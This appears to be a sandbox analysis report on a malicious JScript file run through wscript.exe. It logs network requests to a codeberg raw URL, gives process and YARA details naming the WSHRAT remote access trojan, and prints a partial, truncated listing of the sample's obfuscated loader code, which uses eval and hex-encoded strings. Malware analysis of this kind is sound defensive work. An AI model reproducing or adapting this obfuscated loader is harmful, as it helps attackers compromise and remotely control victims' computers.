                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                    Host: codeberg.org
                    Connection: Keep-Alive
                    Cookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
                    2024-04-09 15:57:04 UTC383INHTTP/1.1 404 Not Found
                    cache-control: max-age=0, private, must-revalidate, no-transform
                    content-type: text/plain;charset=utf-8
                    date: Tue, 09 Apr 2024 15:57:04 GMT
                    content-length: 11
                    strict-transport-security: max-age=63072000; includeSubDomains; preload
                    permissions-policy: interest-cohort=()
                    x-frame-options: sameorigin
                    x-content-type-options: nosniff
                    connection: close
                    2024-04-09 15:57:04 UTC11INData Raw: 4e 6f 74 20 66 6f 75 6e 64 2e 0a
                    Data Ascii: Not found.


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    26192.168.2.749734217.197.91.1454431280C:\Windows\System32\wscript.exe
                    TimestampBytes transferredDirectionData
                    2024-04-09 15:57:06 UTC466OUTGET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1
                    Accept: */*
                    Accept-Language: en-ch
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                    Host: codeberg.org
                    Connection: Keep-Alive
                    Cookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
                    2024-04-09 15:57:06 UTC383INHTTP/1.1 404 Not Found
                    cache-control: max-age=0, private, must-revalidate, no-transform
                    content-type: text/plain;charset=utf-8
                    date: Tue, 09 Apr 2024 15:57:06 GMT
                    content-length: 11
                    strict-transport-security: max-age=63072000; includeSubDomains; preload
                    permissions-policy: interest-cohort=()
                    x-frame-options: sameorigin
                    x-content-type-options: nosniff
                    connection: close
                    2024-04-09 15:57:06 UTC11INData Raw: 4e 6f 74 20 66 6f 75 6e 64 2e 0a
                    Data Ascii: Not found.


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    27192.168.2.749735217.197.91.1454431280C:\Windows\System32\wscript.exe
                    TimestampBytes transferredDirectionData
                    2024-04-09 15:57:09 UTC466OUTGET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1
                    Accept: */*
                    Accept-Language: en-ch
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                    Host: codeberg.org
                    Connection: Keep-Alive
                    Cookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
                    2024-04-09 15:57:09 UTC383INHTTP/1.1 404 Not Found
                    cache-control: max-age=0, private, must-revalidate, no-transform
                    content-type: text/plain;charset=utf-8
                    date: Tue, 09 Apr 2024 15:57:09 GMT
                    content-length: 11
                    strict-transport-security: max-age=63072000; includeSubDomains; preload
                    permissions-policy: interest-cohort=()
                    x-frame-options: sameorigin
                    x-content-type-options: nosniff
                    connection: close
                    2024-04-09 15:57:09 UTC11INData Raw: 4e 6f 74 20 66 6f 75 6e 64 2e 0a
                    Data Ascii: Not found.


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    28192.168.2.749737217.197.91.1454431280C:\Windows\System32\wscript.exe
                    TimestampBytes transferredDirectionData
                    2024-04-09 15:59:17 UTC466OUTGET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1
                    Accept: */*
                    Accept-Language: en-ch
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                    Host: codeberg.org
                    Connection: Keep-Alive
                    Cookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA


                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    System Behavior

                    General

                    Target ID:1
                    Start time:17:55:47
                    Start date:09/04/2024
                    Path:C:\Windows\System32\wscript.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\CNWSFY59Z6S1D.JS"
                    Imagebase:0x7ff7701c0000
                    File size:170'496 bytes
                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000001.00000003.1210816033.000001A3BFF9E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000001.00000002.3698182395.000001A3C35B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:high
                    Has exited:false

                    Disassembly

                    Code Analysis

                    Call Graph

                    • Executed
                    • Not Executed
                    callgraph clusterC0 clusterC2C0 clusterC4C2 clusterC6C0 clusterC8C6 clusterC10C6 clusterC12C6 clusterC14C6 clusterC16C6 clusterC18C6 clusterC20C6 clusterC22C0 clusterC24C22 clusterC26C0 clusterC28C0 clusterC30C28 clusterC32C0 clusterC34C32 clusterC36C32 clusterC38C32 clusterC40C32 clusterC42C32 clusterC44C32 clusterC46C0 clusterC48C0 clusterC50C48 clusterC52C0 clusterC54C0 clusterC56C0 clusterC58C56 clusterC60C0 clusterC62C60 clusterC64C0 clusterC66C64 clusterC68C64 clusterC70C64 clusterC72C64 clusterC74C64 clusterC76C64 clusterC78C0 clusterC80C0 clusterC82C80 clusterC84C80 clusterC86C0 clusterC88C86 clusterC90C0 clusterC92C90 clusterC94C0 clusterC96C94 clusterC98C94 clusterC100C94 clusterC102C94 clusterC104C94 clusterC106C94 clusterC108C0 clusterC110C0 clusterC112C0 clusterC114C112 clusterC116C0 clusterC118C116 clusterC120C0 clusterC122C120 clusterC124C120 clusterC126C120 clusterC128C120 clusterC130C120 clusterC132C120 clusterC134C0 clusterC136C0 E1C0 entry:C0 F7C6 E1C0->F7C6 F27C26 _0x5223ca E1C0->F27C26 F47C46 _0x48de49 E1C0->F47C46 F53C52 Array E1C0->F53C52 F55C54 eval E1C0->F55C54 F79C78 _0x557ff3 E1C0->F79C78 F109C108 _0x5a2c8a E1C0->F109C108 F111C110 'join' E1C0->F111C110 F3C2 _0x2a94 F3C2->F3C2 F5C4 F9C8 _0x22ce22 F7C6->F9C8 F11C10 parseInt F7C6->F11C10 F13C12 _0x50ae4b F7C6->F13C12 F15C14 'push' F7C6->F15C14 F17C16 'shift' F7C6->F17C16 F19C18 'push' F7C6->F19C18 F21C20 'shift' F7C6->F21C20 F23C22 _0x27ba F23C22->F3C2 F23C22->F23C22 F25C24 F29C28 _0x41bc F29C28->F29C28 F49C48 _0x300b F29C28->F49C48 F31C30 F33C32 F33C32->F29C28 F35C34 _0x186ccf F33C32->F35C34 F37C36 parseInt F33C32->F37C36 F39C38 'push' F33C32->F39C38 F41C40 'shift' F33C32->F41C40 F43C42 'push' F33C32->F43C42 F45C44 'shift' F33C32->F45C44 F49C48->F49C48 F51C50 F57C56 _0xeae7 F57C56->F57C56 F59C58 F61C60 _0x228c F61C60->F57C56 F61C60->F61C60 F63C62 F65C64 F65C64->F61C60 F67C66 _0x2ab462 F65C64->F67C66 F69C68 parseInt F65C64->F69C68 F71C70 'push' F65C64->F71C70 F73C72 'shift' F65C64->F73C72 F75C74 'push' F65C64->F75C74 F77C76 'shift' F65C64->F77C76 F81C80 F83C82 _0x3d9dcb F81C80->F83C82 F85C84 F87C86 _0x2a11 F87C86->F87C86 F91C90 _0x414d F87C86->F91C90 F89C88 F91C90->F91C90 F93C92 F95C94 F95C94->F87C86 F97C96 _0xd04537 F95C94->F97C96 F99C98 parseInt F95C94->F99C98 F101C100 'push' F95C94->F101C100 F103C102 'shift' F95C94->F103C102 F105C104 'push' F95C94->F105C104 F107C106 'shift' F95C94->F107C106 F113C112 _0x59be F113C112->F113C112 F115C114 F117C116 _0x475c F117C116->F113C112 F117C116->F117C116 F119C118 F121C120 F121C120->F117C116 F123C122 _0x3b8901 F121C120->F123C122 F125C124 parseInt F121C120->F125C124 F127C126 'push' F121C120->F127C126 F129C128 'shift' F121C120->F129C128 F131C130 'push' F121C120->F131C130 F133C132 'shift' F121C120->F133C132 F135C134 F137C136 F137C136->F55C54 F137C136->F117C116

                    Script:

                    Code
                    0
                    try
                      1
                      {
                        2
                        var _0x31ed = [ "\x64\x6D\x46\x79\x49\x48\x6C\x69\x62\x57\x77\x37\x7B\x31\x7D\x51\x70\x32\x59\x58...
                          3
                          var XPBNFBNTLNVW = _0x31ed[0];
                            4
                            var HAQAYZCQOWOB = _0x31ed[_0x31ed.length - 1];
                              5
                              var _0x42b2 = [ "\x70\x72\x6F\x63", "\x70\x72\x6F\x74\x6F\x74\x79\x70\x65", "\x43\x72\x65\x61\x74...
                                6
                                var _0xc188 = [ "\x6F\x74\x79\x70\x65\x2E\x66\x34\x6D\x31\x6C\x59\x20\x3D\x20\x5B\x22\x52\x55\x4F...
                                  7
                                  var _0x5223ca = _0x27ba;
                                    8
                                    function _0x2a94() {
                                      9
                                      var _0x45bb6b = [ '15397wWvFvL', '5rsFWvL', '2010rLhAFq', '3184566DtBCdj', '8959122xEaZji', '4361...
                                        10
                                        _0x2a94 =
                                          11
                                          function () {
                                            12
                                            return _0x45bb6b;
                                              13
                                              };
                                                14
                                                return _0x2a94 ( );
                                                  15
                                                  }
                                                    16
                                                    ( function (_0x22ce22, _0x1cecae) {
                                                      17
                                                      var _0x50ae4b = _0x27ba, _0x4fa990 = _0x22ce22 ( );
                                                        18
                                                        while (! ! [ ] )
                                                          19
                                                          {
                                                            20
                                                            try
                                                              21
                                                              {
                                                                22
                                                                var _0x25de5e = parseInt ( _0x50ae4b ( 0x16a ) ) / 0x1 + - parseInt ( _0x50ae4b ( 0x162 ) ) / 0x2...
                                                                  23
                                                                  if ( _0x25de5e === _0x1cecae )
                                                                    24
                                                                    break ;
                                                                      25
                                                                      else
                                                                        26
                                                                        _0x4fa990['push'] ( _0x4fa990['shift'] ( ) );
                                                                          27
                                                                          }
                                                                            28
                                                                            catch ( _0x25a06e )
                                                                              29
                                                                              {
                                                                                30
                                                                                _0x4fa990['push'] ( _0x4fa990['shift'] ( ) );
                                                                                  31
                                                                                  }
                                                                                    32
                                                                                    }
                                                                                      33
                                                                                      } ( _0x2a94, 0xd3311 ) );
                                                                                        34
                                                                                        function _0x27ba(_0x503518, _0x32f208) {
                                                                                          35
                                                                                          var _0x2a9448 = _0x2a94 ( );
                                                                                            36
                                                                                            return _0x27ba =
                                                                                              37
                                                                                              function (_0x27baa6, _0x25f382) {
                                                                                                38
                                                                                                _0x27baa6 = _0x27baa6 - 0x160;
                                                                                                  39
                                                                                                  var _0x4e895b = _0x2a9448[_0x27baa6];
                                                                                                    40
                                                                                                    return _0x4e895b;
                                                                                                      41
                                                                                                      }, _0x27ba ( _0x503518, _0x32f208 );
                                                                                                        42
                                                                                                        }
                                                                                                          43
                                                                                                          var OILDNHXDWJEM = _0x5223ca ( 0x168 );
                                                                                                            44
                                                                                                            var _0xa35c = [ "\x52\x55\x4F\x44\x49\x4D\x46\x5B\x34\x5D\x28\x29\x5B\x52\x55\x4F\x44\x49\x4D\x46...
                                                                                                              45
                                                                                                              var _0x48de49 = _0x41bc;
                                                                                                                46
                                                                                                                function _0x41bc(_0x179b12, _0x22e550) {
                                                                                                                  47
                                                                                                                  var _0x300b64 = _0x300b ( );
                                                                                                                    48
                                                                                                                    return _0x41bc =
                                                                                                                      49
                                                                                                                      function (_0x41bc85, _0x199135) {
                                                                                                                        50
                                                                                                                        _0x41bc85 = _0x41bc85 - 0x122;
                                                                                                                          51
                                                                                                                          var _0x14c109 = _0x300b64[_0x41bc85];
                                                                                                                            52
                                                                                                                            return _0x14c109;
                                                                                                                              53
                                                                                                                              }, _0x41bc ( _0x179b12, _0x22e550 );
                                                                                                                                54
                                                                                                                                }
                                                                                                                                  55
                                                                                                                                  ( function (_0x186ccf, _0x14c92f) {
                                                                                                                                    56
                                                                                                                                    var _0x128bcc = _0x41bc, _0x19d679 = _0x186ccf ( );
                                                                                                                                      57
                                                                                                                                      while (! ! [ ] )
                                                                                                                                        58
                                                                                                                                        {
                                                                                                                                          59
                                                                                                                                          try
                                                                                                                                            60
                                                                                                                                            {
                                                                                                                                              61
                                                                                                                                              var _0x58ea8c = - parseInt ( _0x128bcc ( 0x127 ) ) / 0x1 + - parseInt ( _0x128bcc ( 0x123 ) ) / 0...
                                                                                                                                                62
                                                                                                                                                if ( _0x58ea8c === _0x14c92f )
                                                                                                                                                  63
                                                                                                                                                  break ;
                                                                                                                                                    64
                                                                                                                                                    else
                                                                                                                                                      65
                                                                                                                                                      _0x19d679['push'] ( _0x19d679['shift'] ( ) );
                                                                                                                                                        66
                                                                                                                                                        }
                                                                                                                                                          67
                                                                                                                                                          catch ( _0x471eff )
                                                                                                                                                            68
                                                                                                                                                            {
                                                                                                                                                              69
                                                                                                                                                              _0x19d679['push'] ( _0x19d679['shift'] ( ) );
                                                                                                                                                                70
                                                                                                                                                                }
                                                                                                                                                                  71
                                                                                                                                                                  }
                                                                                                                                                                    72
                                                                                                                                                                    } ( _0x300b, 0xa49f5 ) );
                                                                                                                                                                      73
                                                                                                                                                                      var FZSXYHNHBILD = _0x48de49 ( 0x128 );
                                                                                                                                                                        74
                                                                                                                                                                        function _0x300b() {
                                                                                                                                                                          75
                                                                                                                                                                          var _0x18bf45 = [ '9QnJRTO', '6732340LQgKqL', '4024bTGBLP', '868744TSeEkN', '105YOeUnk', '156708e...
                                                                                                                                                                            76
                                                                                                                                                                            _0x300b =
                                                                                                                                                                              77
                                                                                                                                                                              function () {
                                                                                                                                                                                78
                                                                                                                                                                                return _0x18bf45;
                                                                                                                                                                                  79
                                                                                                                                                                                  };
                                                                                                                                                                                    80
                                                                                                                                                                                    return _0x300b ( );
                                                                                                                                                                                      81
                                                                                                                                                                                      }
                                                                                                                                                                                        82
                                                                                                                                                                                        }
                                                                                                                                                                                          83
                                                                                                                                                                                          catch ( error )
                                                                                                                                                                                            84
                                                                                                                                                                                            {
                                                                                                                                                                                              85
                                                                                                                                                                                              }
                                                                                                                                                                                                86
                                                                                                                                                                                                try
                                                                                                                                                                                                  87
                                                                                                                                                                                                  {
                                                                                                                                                                                                    88
                                                                                                                                                                                                    String[_0x42b2[0x1]][_0x42b2[0x0]] = eval;
                                                                                                                                                                                                      89
                                                                                                                                                                                                      var RUODIMF = [ null, Array ( _0x42b2[0x2], _0x42b2[0x3], _0x42b2[0x4], _0x42b2[0x5], _0x42b2[0x6...
                                                                                                                                                                                                        90
                                                                                                                                                                                                        eval ( _0x42b2[0xe] );
                                                                                                                                                                                                          91
                                                                                                                                                                                                          function _0xeae7() {
                                                                                                                                                                                                            92
                                                                                                                                                                                                            var _0x5c72bc = [ '333BYNZxa', '2918125cqLQmp', '5773830eDgHxC', 'prototype', '404481ZPAYTK', '16...
                                                                                                                                                                                                              93
                                                                                                                                                                                                              _0xeae7 =
                                                                                                                                                                                                                94
                                                                                                                                                                                                                function () {
                                                                                                                                                                                                                  95
                                                                                                                                                                                                                  return _0x5c72bc;
                                                                                                                                                                                                                    96
                                                                                                                                                                                                                    };
                                                                                                                                                                                                                      97
                                                                                                                                                                                                                      return _0xeae7 ( );
                                                                                                                                                                                                                        98
                                                                                                                                                                                                                        }
                                                                                                                                                                                                                          99
                                                                                                                                                                                                                          var _0x557ff3 = _0x228c;
                                                                                                                                                                                                                            100
                                                                                                                                                                                                                            function _0x228c(_0x114bd0, _0x447caa) {
                                                                                                                                                                                                                              101
                                                                                                                                                                                                                              var _0xeae707 = _0xeae7 ( );
                                                                                                                                                                                                                                102
                                                                                                                                                                                                                                return _0x228c =
                                                                                                                                                                                                                                  103
                                                                                                                                                                                                                                  function (_0x228c03, _0x225376) {
                                                                                                                                                                                                                                    104
                                                                                                                                                                                                                                    _0x228c03 = _0x228c03 - 0x65;
                                                                                                                                                                                                                                      105
                                                                                                                                                                                                                                      var _0x3a638b = _0xeae707[_0x228c03];
                                                                                                                                                                                                                                        106
                                                                                                                                                                                                                                        return _0x3a638b;
                                                                                                                                                                                                                                          107
                                                                                                                                                                                                                                          }, _0x228c ( _0x114bd0, _0x447caa );
                                                                                                                                                                                                                                            108
                                                                                                                                                                                                                                            }
                                                                                                                                                                                                                                              109
                                                                                                                                                                                                                                              ( function (_0x2ab462, _0x1cc490) {
                                                                                                                                                                                                                                                110
                                                                                                                                                                                                                                                var _0x26b9cb = _0x228c, _0x2cda2e = _0x2ab462 ( );
                                                                                                                                                                                                                                                  111
                                                                                                                                                                                                                                                  while (! ! [ ] )
                                                                                                                                                                                                                                                    112
                                                                                                                                                                                                                                                    {
                                                                                                                                                                                                                                                      113
                                                                                                                                                                                                                                                      try
                                                                                                                                                                                                                                                        114
                                                                                                                                                                                                                                                        {
                                                                                                                                                                                                                                                          115
                                                                                                                                                                                                                                                          var _0x287683 = parseInt ( _0x26b9cb ( 0x68 ) ) / 0x1 + parseInt ( _0x26b9cb ( 0x6e ) ) / 0x2 * (...
                                                                                                                                                                                                                                                            116
                                                                                                                                                                                                                                                            if ( _0x287683 === _0x1cc490 )
                                                                                                                                                                                                                                                              117
                                                                                                                                                                                                                                                              break ;
                                                                                                                                                                                                                                                                118
                                                                                                                                                                                                                                                                else
                                                                                                                                                                                                                                                                  119
                                                                                                                                                                                                                                                                  _0x2cda2e['push'] ( _0x2cda2e['shift'] ( ) );
                                                                                                                                                                                                                                                                    120
                                                                                                                                                                                                                                                                    }
                                                                                                                                                                                                                                                                      121
                                                                                                                                                                                                                                                                      catch ( _0x50ca54 )
                                                                                                                                                                                                                                                                        122
                                                                                                                                                                                                                                                                        {
                                                                                                                                                                                                                                                                          123
                                                                                                                                                                                                                                                                          _0x2cda2e['push'] ( _0x2cda2e['shift'] ( ) );
                                                                                                                                                                                                                                                                            124
                                                                                                                                                                                                                                                                            }
                                                                                                                                                                                                                                                                              125
                                                                                                                                                                                                                                                                              }
                                                                                                                                                                                                                                                                                126
                                                                                                                                                                                                                                                                                } ( _0xeae7, 0xa20aa ),
                                                                                                                                                                                                                                                                                  127
                                                                                                                                                                                                                                                                                  Array[_0x557ff3 ( 0x67 ) ][_0x557ff3 ( 0x6a ) ] =
                                                                                                                                                                                                                                                                                    128
                                                                                                                                                                                                                                                                                    function () {
                                                                                                                                                                                                                                                                                      129
                                                                                                                                                                                                                                                                                      var _0x3d9dcb = _0x557ff3, _0xb18ed8 = arguments;
                                                                                                                                                                                                                                                                                        130
                                                                                                                                                                                                                                                                                        return this[0x0][_0x3d9dcb ( 0x6d ) ] ( /{(\d+)}/g,
                                                                                                                                                                                                                                                                                          131
                                                                                                                                                                                                                                                                                          function (_0x1c8168, _0xcb677b) {
                                                                                                                                                                                                                                                                                            132
                                                                                                                                                                                                                                                                                            try
                                                                                                                                                                                                                                                                                              133
                                                                                                                                                                                                                                                                                              {
                                                                                                                                                                                                                                                                                                134
                                                                                                                                                                                                                                                                                                return _0xb18ed8[_0xcb677b];
                                                                                                                                                                                                                                                                                                  135
                                                                                                                                                                                                                                                                                                  }
                                                                                                                                                                                                                                                                                                    136
                                                                                                                                                                                                                                                                                                    catch ( _0x49dc98 )
                                                                                                                                                                                                                                                                                                      137
                                                                                                                                                                                                                                                                                                      {
                                                                                                                                                                                                                                                                                                        138
                                                                                                                                                                                                                                                                                                        return _0x1c8168;
                                                                                                                                                                                                                                                                                                          139
                                                                                                                                                                                                                                                                                                          }
                                                                                                                                                                                                                                                                                                            140
                                                                                                                                                                                                                                                                                                            } ) ;
                                                                                                                                                                                                                                                                                                              141
                                                                                                                                                                                                                                                                                                              } );
                                                                                                                                                                                                                                                                                                                142
                                                                                                                                                                                                                                                                                                                if ( XPBNFBNTLNVW != null )
                                                                                                                                                                                                                                                                                                                  143
                                                                                                                                                                                                                                                                                                                  {
                                                                                                                                                                                                                                                                                                                    144
                                                                                                                                                                                                                                                                                                                    Array.prototype.s0fStu = HAQAYZCQOWOB;
                                                                                                                                                                                                                                                                                                                      145
                                                                                                                                                                                                                                                                                                                      }
                                                                                                                                                                                                                                                                                                                        146
                                                                                                                                                                                                                                                                                                                        RUODIMF[0x2] = Array ( _0xa35c[0x0], _0xa35c[0x1], _0xa35c[0x2], null );
                                                                                                                                                                                                                                                                                                                          147
                                                                                                                                                                                                                                                                                                                          }
                                                                                                                                                                                                                                                                                                                            148
                                                                                                                                                                                                                                                                                                                            catch ( error )
                                                                                                                                                                                                                                                                                                                              149
                                                                                                                                                                                                                                                                                                                              {
                                                                                                                                                                                                                                                                                                                                150
                                                                                                                                                                                                                                                                                                                                }
                                                                                                                                                                                                                                                                                                                                  151
                                                                                                                                                                                                                                                                                                                                  try
                                                                                                                                                                                                                                                                                                                                    152
                                                                                                                                                                                                                                                                                                                                    {
                                                                                                                                                                                                                                                                                                                                      153
                                                                                                                                                                                                                                                                                                                                      var _0x5a2c8a = _0x2a11;
                                                                                                                                                                                                                                                                                                                                        154
                                                                                                                                                                                                                                                                                                                                        function _0x2a11(_0x599b12, _0x43f623) {
                                                                                                                                                                                                                                                                                                                                          155
                                                                                                                                                                                                                                                                                                                                          var _0x414dec = _0x414d ( );
                                                                                                                                                                                                                                                                                                                                            156
                                                                                                                                                                                                                                                                                                                                            return _0x2a11 =
                                                                                                                                                                                                                                                                                                                                              157
                                                                                                                                                                                                                                                                                                                                              function (_0x2a11fa, _0x10aa91) {
                                                                                                                                                                                                                                                                                                                                                158
                                                                                                                                                                                                                                                                                                                                                _0x2a11fa = _0x2a11fa - 0x1b0;
                                                                                                                                                                                                                                                                                                                                                  159
                                                                                                                                                                                                                                                                                                                                                  var _0x52bd4a = _0x414dec[_0x2a11fa];
                                                                                                                                                                                                                                                                                                                                                    160
                                                                                                                                                                                                                                                                                                                                                    return _0x52bd4a;
                                                                                                                                                                                                                                                                                                                                                      161
                                                                                                                                                                                                                                                                                                                                                      }, _0x2a11 ( _0x599b12, _0x43f623 );
                                                                                                                                                                                                                                                                                                                                                        162
                                                                                                                                                                                                                                                                                                                                                        }
                                                                                                                                                                                                                                                                                                                                                          163
                                                                                                                                                                                                                                                                                                                                                          function _0x414d() {
                                                                                                                                                                                                                                                                                                                                                            164
                                                                                                                                                                                                                                                                                                                                                            var _0x48f6ac = [ '783006SogRkb', '5266omAMio', '388660bqNjNl', 'bst', '15YDpsBA', '2873766eTSsYO...
                                                                                                                                                                                                                                                                                                                                                              165
                                                                                                                                                                                                                                                                                                                                                              _0x414d =
                                                                                                                                                                                                                                                                                                                                                                166
                                                                                                                                                                                                                                                                                                                                                                function () {
                                                                                                                                                                                                                                                                                                                                                                  167
                                                                                                                                                                                                                                                                                                                                                                  return _0x48f6ac;
                                                                                                                                                                                                                                                                                                                                                                    168
                                                                                                                                                                                                                                                                                                                                                                    };
                                                                                                                                                                                                                                                                                                                                                                      169
                                                                                                                                                                                                                                                                                                                                                                      return _0x414d ( );
                                                                                                                                                                                                                                                                                                                                                                        170
                                                                                                                                                                                                                                                                                                                                                                        }
                                                                                                                                                                                                                                                                                                                                                                          171
                                                                                                                                                                                                                                                                                                                                                                          ( function (_0xd04537, _0x5218e5) {
                                                                                                                                                                                                                                                                                                                                                                            172
                                                                                                                                                                                                                                                                                                                                                                            var _0x2d3869 = _0x2a11, _0x5c8d55 = _0xd04537 ( );
                                                                                                                                                                                                                                                                                                                                                                              173
                                                                                                                                                                                                                                                                                                                                                                              while (! ! [ ] )
                                                                                                                                                                                                                                                                                                                                                                                174
                                                                                                                                                                                                                                                                                                                                                                                {
                                                                                                                                                                                                                                                                                                                                                                                  175
                                                                                                                                                                                                                                                                                                                                                                                  try
                                                                                                                                                                                                                                                                                                                                                                                    176
                                                                                                                                                                                                                                                                                                                                                                                    {
                                                                                                                                                                                                                                                                                                                                                                                      177
                                                                                                                                                                                                                                                                                                                                                                                      var _0x21794c = - parseInt ( _0x2d3869 ( 0x1bd ) ) / 0x1 + parseInt ( _0x2d3869 ( 0x1b2 ) ) / 0x2...
                                                                                                                                                                                                                                                                                                                                                                                        178
                                                                                                                                                                                                                                                                                                                                                                                        if ( _0x21794c === _0x5218e5 )
                                                                                                                                                                                                                                                                                                                                                                                          179
                                                                                                                                                                                                                                                                                                                                                                                          break ;
                                                                                                                                                                                                                                                                                                                                                                                            180
                                                                                                                                                                                                                                                                                                                                                                                            else
                                                                                                                                                                                                                                                                                                                                                                                              181
                                                                                                                                                                                                                                                                                                                                                                                              _0x5c8d55['push'] ( _0x5c8d55['shift'] ( ) );
                                                                                                                                                                                                                                                                                                                                                                                                182
                                                                                                                                                                                                                                                                                                                                                                                                }
                                                                                                                                                                                                                                                                                                                                                                                                  183
                                                                                                                                                                                                                                                                                                                                                                                                  catch ( _0x13a5aa )
                                                                                                                                                                                                                                                                                                                                                                                                    184
                                                                                                                                                                                                                                                                                                                                                                                                    {
                                                                                                                                                                                                                                                                                                                                                                                                      185
                                                                                                                                                                                                                                                                                                                                                                                                      _0x5c8d55['push'] ( _0x5c8d55['shift'] ( ) );
                                                                                                                                                                                                                                                                                                                                                                                                        186
                                                                                                                                                                                                                                                                                                                                                                                                        }
                                                                                                                                                                                                                                                                                                                                                                                                          187
                                                                                                                                                                                                                                                                                                                                                                                                          }
                                                                                                                                                                                                                                                                                                                                                                                                            188
                                                                                                                                                                                                                                                                                                                                                                                                            } ( _0x414d, 0xa906b ), RUODIMF[0x3] = Array ( WSH[RUODIMF[0x1][0x0]] ( [ _0x5a2c8a ( 0x1bc ) ][...
                                                                                                                                                                                                                                                                                                                                                                                                              189
                                                                                                                                                                                                                                                                                                                                                                                                              function _0x59be() {
                                                                                                                                                                                                                                                                                                                                                                                                                190
                                                                                                                                                                                                                                                                                                                                                                                                                var _0x3dc390 = [ '5WEyrjq', '8jvtQFi', '775aWsIwk', '684610ykLdgD', '12SPMuKd', '843801EpwIJA', ...
                                                                                                                                                                                                                                                                                                                                                                                                                  191
                                                                                                                                                                                                                                                                                                                                                                                                                  _0x59be =
                                                                                                                                                                                                                                                                                                                                                                                                                    192
                                                                                                                                                                                                                                                                                                                                                                                                                    function () {
                                                                                                                                                                                                                                                                                                                                                                                                                      193
                                                                                                                                                                                                                                                                                                                                                                                                                      return _0x3dc390;
                                                                                                                                                                                                                                                                                                                                                                                                                        194
                                                                                                                                                                                                                                                                                                                                                                                                                        };
                                                                                                                                                                                                                                                                                                                                                                                                                          195
                                                                                                                                                                                                                                                                                                                                                                                                                          return _0x59be ( );
                                                                                                                                                                                                                                                                                                                                                                                                                            196
                                                                                                                                                                                                                                                                                                                                                                                                                            }
                                                                                                                                                                                                                                                                                                                                                                                                                              197
                                                                                                                                                                                                                                                                                                                                                                                                                              function _0x475c(_0x281eaa, _0x2e06b6) {
                                                                                                                                                                                                                                                                                                                                                                                                                                198
                                                                                                                                                                                                                                                                                                                                                                                                                                var _0x59bec3 = _0x59be ( );
                                                                                                                                                                                                                                                                                                                                                                                                                                  199
                                                                                                                                                                                                                                                                                                                                                                                                                                  return _0x475c =
                                                                                                                                                                                                                                                                                                                                                                                                                                    200
                                                                                                                                                                                                                                                                                                                                                                                                                                    function (_0x475cb4, _0x13754d) {
                                                                                                                                                                                                                                                                                                                                                                                                                                      201
                                                                                                                                                                                                                                                                                                                                                                                                                                      _0x475cb4 = _0x475cb4 - 0x1d8;
                                                                                                                                                                                                                                                                                                                                                                                                                                        202
                                                                                                                                                                                                                                                                                                                                                                                                                                        var _0xeecc6b = _0x59bec3[_0x475cb4];
                                                                                                                                                                                                                                                                                                                                                                                                                                          203
                                                                                                                                                                                                                                                                                                                                                                                                                                          return _0xeecc6b;
                                                                                                                                                                                                                                                                                                                                                                                                                                            204
                                                                                                                                                                                                                                                                                                                                                                                                                                            }, _0x475c ( _0x281eaa, _0x2e06b6 );
                                                                                                                                                                                                                                                                                                                                                                                                                                              205
                                                                                                                                                                                                                                                                                                                                                                                                                                              }
                                                                                                                                                                                                                                                                                                                                                                                                                                                206
                                                                                                                                                                                                                                                                                                                                                                                                                                                ( function (_0x3b8901, _0x5cf182) {
                                                                                                                                                                                                                                                                                                                                                                                                                                                  207
                                                                                                                                                                                                                                                                                                                                                                                                                                                  var _0x4e5a93 = _0x475c, _0x47acf3 = _0x3b8901 ( );
                                                                                                                                                                                                                                                                                                                                                                                                                                                    208
                                                                                                                                                                                                                                                                                                                                                                                                                                                    while (! ! [ ] )
                                                                                                                                                                                                                                                                                                                                                                                                                                                      209
                                                                                                                                                                                                                                                                                                                                                                                                                                                      {
                                                                                                                                                                                                                                                                                                                                                                                                                                                        210
                                                                                                                                                                                                                                                                                                                                                                                                                                                        try
                                                                                                                                                                                                                                                                                                                                                                                                                                                          211
